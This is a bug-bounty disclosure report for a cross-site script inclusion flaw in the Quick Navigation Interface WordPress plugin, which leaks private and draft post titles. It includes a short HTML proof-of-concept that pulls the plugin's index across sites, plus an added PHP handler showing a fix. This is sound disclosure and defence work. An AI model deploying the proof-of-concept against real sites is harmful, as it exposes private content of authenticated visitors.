Ian Dunn: XSSI: Quick Navigation Interface - leak of private page/post titles

2019-02-13T20:31:28
ID H1:495525
Type hackerone
Reporter foobar7
Modified 2019-02-15T08:03:49

Description

CVSS

Medium 4.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Description

The Quick Navigation Interface plugin includes the names of all posts and pages in an automatically generated JavaScript file.

By including this file in their own page, an attacker can view all post titles - including those of drafts and private posts, which should remain secret - if an authenticated user visits their website.

POC

Setup: install the plugin & create a private post (set "Visibility" to "private").

While authenticated, visit a webpage that contains the following HTML code:

<script src="http://192.168.0.104/wordpress5/wordpress/wp-admin/admin-ajax.php?action=qni_content_index"></script>
<script>
// The included script assigns the full content index (including private/draft titles) to a global.
console.log(window.qniContentIndex); // in a real-world attack, this would be sent to the attacker's server
</script>

Impact

disclosure of private post/page titles
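As an added illustration (not the plugin's code and not part of the report), a WordPress AJAX handler for the same action name that closes this class of hole: it requires a nonce, which a cross-site <script src> include cannot supply, returns only entries the current user is allowed to read, and responds with JSON instead of an executable script. The nonce action name qni_index and the function name are assumptions.

```php
<?php
// Added example, not the plugin's own code. Only the action name
// qni_content_index comes from the report; 'qni_index' and the
// function name are assumptions for this illustration.

// Register for logged-in users only (wp_ajax_, not wp_ajax_nopriv_).
add_action( 'wp_ajax_qni_content_index', 'example_qni_content_index' );

function example_qni_content_index() {
    // 1. Require a valid nonce. A third-party page can make the victim's
    //    browser send cookies, but it cannot know the per-session nonce,
    //    so a cross-site include stops here with a 403 and no body.
    check_ajax_referer( 'qni_index', 'nonce' );

    // 2. Build the index only from posts the current user may read, so
    //    drafts and private posts of other users are never emitted.
    $posts = get_posts( array(
        'post_type'   => array( 'post', 'page' ),
        'post_status' => array( 'publish', 'private', 'draft', 'pending', 'future' ),
        'numberposts' => -1,
    ) );

    $index = array();
    foreach ( $posts as $post ) {
        if ( ! current_user_can( 'read_post', $post->ID ) ) {
            continue;
        }
        $index[] = array(
            'id'    => $post->ID,
            'title' => get_the_title( $post ),
            'url'   => get_permalink( $post ),
        );
    }

    // 3. Answer with JSON, not a script that assigns a global. A JSON
    //    object is not consumable via <script src>, and admin-ajax.php
    //    already sends X-Content-Type-Options: nosniff, so the browser
    //    refuses to execute the response as JavaScript.
    wp_send_json( $index );
}
```

The legitimate same-origin client passes the nonce (created with wp_create_nonce( 'qni_index' ) and exposed to the admin script) as the `nonce` request parameter and parses the JSON response, instead of loading the endpoint as a script.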